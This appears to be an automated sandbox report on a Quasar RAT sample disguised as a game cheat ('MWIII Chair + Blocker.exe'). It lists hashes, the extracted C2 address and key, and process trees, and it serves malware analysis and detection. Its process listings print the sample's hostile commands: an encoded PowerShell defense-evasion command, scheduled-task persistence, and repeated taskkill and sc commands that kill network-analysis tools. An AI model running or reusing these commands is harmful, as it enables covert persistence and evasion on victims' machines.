Analysis
-
max time kernel
60s -
max time network
63s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
11-07-2024 04:13
Static task
static1
Behavioral task
behavioral1
Sample
MWIII Chair + Blocker.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
MWIII Chair + Blocker.exe
Resource
win10v2004-20240709-en
General
-
Target
MWIII Chair + Blocker.exe
-
Size
47.7MB
-
MD5
479f465034137af69c31b1ba25752ddf
-
SHA1
1a437d072149e6a09ef81336e571ad7c6348fa6e
-
SHA256
72880513939d8b52af76c8796bf066a7d3e7df97e9ef5a1a5076e9178016867b
-
SHA512
f7eaf698eddc3b7f28a1c5d416a7332e20203c56109cd5fc709eea1f7f3d6500f7ac587bc969418d911563b26541cb95cc9de690b62fc5ecd8997a9d1927690d
-
SSDEEP
786432:NlHDtuFgKqlUdKijEIzQviTQ5nGgcPkdzteBG3NAfhO2nlSZYptRZOHOhC+dj:3DtuFbB7fUaTQ5GidBdCh7nLptpC+
Malware Config
Extracted
quasar
1.4.1
Server
193.37.254.35:60553
08e34576-f933-4fe1-9756-64a65f86dc05
-
encryption_key
8DED0FEFCB0F93A016A6DAD812C6D6D58DEE8547
-
install_name
services86.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
services86
-
subdirectory
Files
Signatures
-
Quasar payload 3 IoCs
resource yara_rule behavioral1/files/0x000a00000001202c-2.dat family_quasar behavioral1/memory/2848-10-0x0000000000350000-0x0000000000674000-memory.dmp family_quasar behavioral1/memory/1292-51-0x00000000010D0000-0x00000000013F4000-memory.dmp family_quasar -
Executes dropped EXE 6 IoCs
pid Process 2848 services86.exe 2808 services64.exe 2548 services64.exe 2584 dependencies.exe 1292 services86.exe 1228 Process not Found -
Loads dropped DLL 5 IoCs
pid Process 2644 MWIII Chair + Blocker.exe 2644 MWIII Chair + Blocker.exe 2644 MWIII Chair + Blocker.exe 2548 services64.exe 1228 Process not Found -
resource yara_rule behavioral1/files/0x0005000000019613-30.dat upx behavioral1/memory/2548-35-0x000007FEF38C0000-0x000007FEF3D26000-memory.dmp upx -
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1028 cmd.exe 1208 powercfg.exe 744 cmd.exe 2540 powercfg.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\Files services86.exe File opened for modification C:\Windows\system32\Files\services86.exe services86.exe File opened for modification C:\Windows\system32\Files services86.exe File created C:\Windows\system32\Files\services86.exe services86.exe File opened for modification C:\Windows\system32\Files\services86.exe services86.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2376 sc.exe 1344 sc.exe 2776 sc.exe 1700 sc.exe -
pid Process 2696 powershell.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000700000001871e-13.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 16 IoCs
pid Process 1656 taskkill.exe 540 taskkill.exe 1980 taskkill.exe 2480 taskkill.exe 2960 taskkill.exe 1788 taskkill.exe 3012 taskkill.exe 2436 taskkill.exe 380 taskkill.exe 1776 taskkill.exe 2256 taskkill.exe 2500 taskkill.exe 692 taskkill.exe 1812 taskkill.exe 1596 taskkill.exe 1608 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 912 schtasks.exe 836 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2696 powershell.exe 2584 dependencies.exe 596 powershell.exe 2584 dependencies.exe 2584 dependencies.exe 2584 dependencies.exe 2584 dependencies.exe 2584 dependencies.exe 2584 dependencies.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 2848 services86.exe Token: SeDebugPrivilege 1292 services86.exe Token: SeShutdownPrivilege 1208 powercfg.exe Token: SeShutdownPrivilege 1208 powercfg.exe Token: SeShutdownPrivilege 1208 powercfg.exe Token: SeShutdownPrivilege 1208 powercfg.exe Token: SeShutdownPrivilege 1208 powercfg.exe Token: SeCreatePagefilePrivilege 1208 powercfg.exe Token: SeShutdownPrivilege 2540 powercfg.exe Token: SeShutdownPrivilege 2540 powercfg.exe Token: SeShutdownPrivilege 2540 powercfg.exe Token: SeShutdownPrivilege 2540 powercfg.exe Token: SeShutdownPrivilege 2540 powercfg.exe Token: SeCreatePagefilePrivilege 2540 powercfg.exe Token: SeDebugPrivilege 596 powershell.exe Token: SeDebugPrivilege 1980 taskkill.exe Token: SeDebugPrivilege 540 taskkill.exe Token: SeDebugPrivilege 1788 taskkill.exe Token: SeDebugPrivilege 692 taskkill.exe Token: SeDebugPrivilege 1812 taskkill.exe Token: SeDebugPrivilege 380 taskkill.exe Token: SeDebugPrivilege 1596 taskkill.exe Token: SeDebugPrivilege 1776 taskkill.exe Token: SeDebugPrivilege 2480 taskkill.exe Token: SeDebugPrivilege 3012 taskkill.exe Token: SeDebugPrivilege 1656 taskkill.exe Token: SeDebugPrivilege 2256 taskkill.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeDebugPrivilege 2500 taskkill.exe Token: SeDebugPrivilege 2436 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1292 services86.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2644 wrote to memory of 2696 2644 MWIII Chair + Blocker.exe 30 PID 2644 wrote to memory of 2696 2644 MWIII Chair + Blocker.exe 30 PID 2644 wrote to memory of 2696 2644 MWIII Chair + Blocker.exe 30 PID 2644 wrote to memory of 2696 2644 MWIII Chair + Blocker.exe 30 PID 2644 wrote to memory of 2848 2644 MWIII Chair + Blocker.exe 32 PID 2644 wrote to memory of 2848 2644 MWIII Chair + Blocker.exe 32 PID 2644 wrote to memory of 2848 2644 MWIII Chair + Blocker.exe 32 PID 2644 wrote to memory of 2848 2644 MWIII Chair + Blocker.exe 32 PID 2644 wrote to memory of 2808 2644 MWIII Chair + Blocker.exe 33 PID 2644 wrote to memory of 2808 2644 MWIII Chair + Blocker.exe 33 PID 2644 wrote to memory of 2808 2644 MWIII Chair + Blocker.exe 33 PID 2644 wrote to memory of 2808 2644 MWIII Chair + Blocker.exe 33 PID 2808 wrote to memory of 2548 2808 services64.exe 34 PID 2808 wrote to memory of 2548 2808 services64.exe 34 PID 2808 wrote to memory of 2548 2808 services64.exe 34 PID 2644 wrote to memory of 2584 2644 MWIII Chair + Blocker.exe 35 PID 2644 wrote to memory of 2584 2644 MWIII Chair + Blocker.exe 35 PID 2644 wrote to memory of 2584 2644 MWIII Chair + Blocker.exe 35 PID 2644 wrote to memory of 2584 2644 MWIII Chair + Blocker.exe 35 PID 2848 wrote to memory of 912 2848 services86.exe 37 PID 2848 wrote to memory of 912 2848 services86.exe 37 PID 2848 wrote to memory of 912 2848 services86.exe 37 PID 2848 wrote to memory of 1292 2848 services86.exe 39 PID 2848 wrote to memory of 1292 2848 services86.exe 39 PID 2848 wrote to memory of 1292 2848 services86.exe 39 PID 1292 wrote to memory of 836 1292 services86.exe 40 PID 1292 wrote to memory of 836 1292 services86.exe 40 PID 1292 wrote to memory of 836 1292 services86.exe 40 PID 2584 wrote to memory of 1592 2584 dependencies.exe 42 PID 2584 wrote to memory of 1592 2584 dependencies.exe 42 PID 2584 wrote to memory of 1592 2584 dependencies.exe 42 PID 2584 wrote to memory of 1028 2584 dependencies.exe 43 PID 2584 wrote to memory of 1028 2584 dependencies.exe 43 PID 2584 wrote to memory of 1028 2584 dependencies.exe 43 PID 1028 wrote to memory of 1208 1028 cmd.exe 45 PID 1028 wrote to memory of 1208 1028 cmd.exe 45 PID 1028 wrote to memory of 1208 1028 cmd.exe 45 PID 2584 wrote to memory of 744 2584 dependencies.exe 46 PID 2584 wrote to memory of 744 2584 dependencies.exe 46 PID 2584 wrote to memory of 744 2584 dependencies.exe 46 PID 2584 wrote to memory of 2892 2584 dependencies.exe 47 PID 2584 wrote to memory of 2892 2584 dependencies.exe 47 PID 2584 wrote to memory of 2892 2584 dependencies.exe 47 PID 2892 wrote to memory of 596 2892 cmd.exe 49 PID 2892 wrote to memory of 596 2892 cmd.exe 49 PID 2892 wrote to memory of 596 2892 cmd.exe 49 PID 744 wrote to memory of 2540 744 cmd.exe 50 PID 744 wrote to memory of 2540 744 cmd.exe 50 PID 744 wrote to memory of 2540 744 cmd.exe 50 PID 2584 wrote to memory of 1972 2584 dependencies.exe 51 PID 2584 wrote to memory of 1972 2584 dependencies.exe 51 PID 2584 wrote to memory of 1972 2584 dependencies.exe 51 PID 2584 wrote to memory of 1988 2584 dependencies.exe 52 PID 2584 wrote to memory of 1988 2584 dependencies.exe 52 PID 2584 wrote to memory of 1988 2584 dependencies.exe 52 PID 2584 wrote to memory of 1992 2584 dependencies.exe 53 PID 2584 wrote to memory of 1992 2584 dependencies.exe 53 PID 2584 wrote to memory of 1992 2584 dependencies.exe 53 PID 2584 wrote to memory of 1936 2584 dependencies.exe 54 PID 2584 wrote to memory of 1936 2584 dependencies.exe 54 PID 2584 wrote to memory of 1936 2584 dependencies.exe 54 PID 2584 wrote to memory of 1092 2584 dependencies.exe 55 PID 2584 wrote to memory of 1092 2584 dependencies.exe 55 PID 2584 wrote to memory of 1092 2584 dependencies.exe 55 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\MWIII Chair + Blocker.exe"C:\Users\Admin\AppData\Local\Temp\MWIII Chair + Blocker.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAcQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAegB3ACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Users\Admin\AppData\Local\services86.exe"C:\Users\Admin\AppData\Local\services86.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "services86" /sc ONLOGON /tr "C:\Windows\system32\Files\services86.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:912
-
-
C:\Windows\system32\Files\services86.exe"C:\Windows\system32\Files\services86.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "services86" /sc ONLOGON /tr "C:\Windows\system32\Files\services86.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:836
-
-
-
-
C:\Users\Admin\AppData\Local\services64.exe"C:\Users\Admin\AppData\Local\services64.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Local\services64.exe"C:\Users\Admin\AppData\Local\services64.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2548
-
-
-
C:\Users\Admin\AppData\Local\dependencies.exe"C:\Users\Admin\AppData\Local\dependencies.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:1592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C Powercfg -h off3⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\system32\powercfg.exePowercfg -h off4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C Powercfg -h off3⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\system32\powercfg.exePowercfg -h off4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell "Confirm-SecureBootUEFI" > C:\secureboot_status.txt3⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Confirm-SecureBootUEFI"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&13⤵PID:1972
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&13⤵PID:1988
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&13⤵PID:1992
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
-
C:\Windows\system32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&13⤵PID:1936
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro4⤵
- Launches sc.exe
PID:2376
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&13⤵PID:1092
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
-
C:\Windows\system32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&13⤵PID:1476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\dependencies.exe" MD53⤵PID:1336
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\dependencies.exe" MD54⤵PID:780
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&13⤵PID:2260
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&13⤵PID:2176
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:380
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&13⤵PID:2140
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
-
C:\Windows\system32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&13⤵PID:1808
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro4⤵
- Launches sc.exe
PID:1344
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&13⤵PID:1920
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
-
C:\Windows\system32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&13⤵PID:3036
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&13⤵PID:1352
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&13⤵PID:1772
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&13⤵PID:1796
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
-
C:\Windows\system32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&13⤵PID:1928
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro4⤵
- Launches sc.exe
PID:1700
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&13⤵PID:1308
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
-
C:\Windows\system32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&13⤵PID:1736
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&13⤵PID:1932
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&13⤵PID:1924
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&13⤵PID:1724
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
C:\Windows\system32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&13⤵PID:680
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro4⤵
- Launches sc.exe
PID:2776
-
-
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&13⤵PID:1056
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
-
C:\Windows\system32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&13⤵PID:2356
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
1Windows Service
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD54a6afa2200b1918c413d511c5a3c041c
SHA139ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3
SHA256bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da
SHA512dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20
-
Filesize
10.5MB
MD55f9f741929a6bf741b958638c397bb8d
SHA1e370edb712a9ace94aa3221dcb9b271953c245ff
SHA2569a768722b28c4309ab8ad25b7a94bf4eb6192746d47c69202b17373b7e2dcaa8
SHA51231ca935fe41121d7722fcbe41a803450d9d790f4387b1df68ddfc3865183403f18240d0c8ca514a3b4fb94e9b37cc40b5f8af19400d691099658dbe5279b78cd
-
Filesize
34.1MB
MD5a8a0683a64c14f55844fa0ad6ed345bd
SHA1039100e09e95c19aa19caeb7641417e3d065061d
SHA2569466fb159deb56e656a507de7f621eade9f57ef013f980e5bbc853c9b3df9468
SHA51269d12fb87bcfde005a12e8e60733fbf799d98cd0957669f59db6b485f13067076af82ca07fdcb472ca78a963baef718fa441be9693cce1b3a0eabb84705a7b9d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\87HFYSZYPUNT6REUV2YE.temp
Filesize7KB
MD59396a80a14db337e63200c7fdc4ae79d
SHA131520d7f0ac3ea2f18c7919f8f48c2c2ac203c45
SHA256bc991c88ca75ffea06b8a26bdecc73d7a1aa1b30119da427b9531ce9e0b98f0e
SHA512739179c3bbd06589f1809ba7a88d687550551597cc376b4610851197db57b637549d1219b945a3844035a58a1be0d0e26d5fcffef85009391bf156fd3e94db7f
-
Filesize
447B
MD5cf8355d29a9d97cf5d6a673e64f9fcda
SHA19050f2dd8c50258f22fea4278268357d4133668f
SHA2567fc3a10f21c5405061e1eff734790d1a640ddc1971a84e60070288af8bb161d3
SHA5129669cb9c7100047e4f0c0478edc3c390fde9fa8ae98e5aaf4c204520f6eb3e57c11eb388f72986afd21781c24b2796c39e1aa291d34f481b0de9c94b81bd1a48
-
Filesize
3.1MB
MD5fd0a43d6dbd1e8d51c7fd88fcec20b77
SHA109e5c01eb89bc3f56505776b4029170012329671
SHA256c545f6df14ab1fa59235838ddb48572637fdebf237d96d0978cd55acbaa86311
SHA512594619cd351091392a039543d6c766545cac477becff14ad0116b881a376e924d98ef116c66be41181daa41c7d1b6c36ea95bf028f92ce29418f22311175893e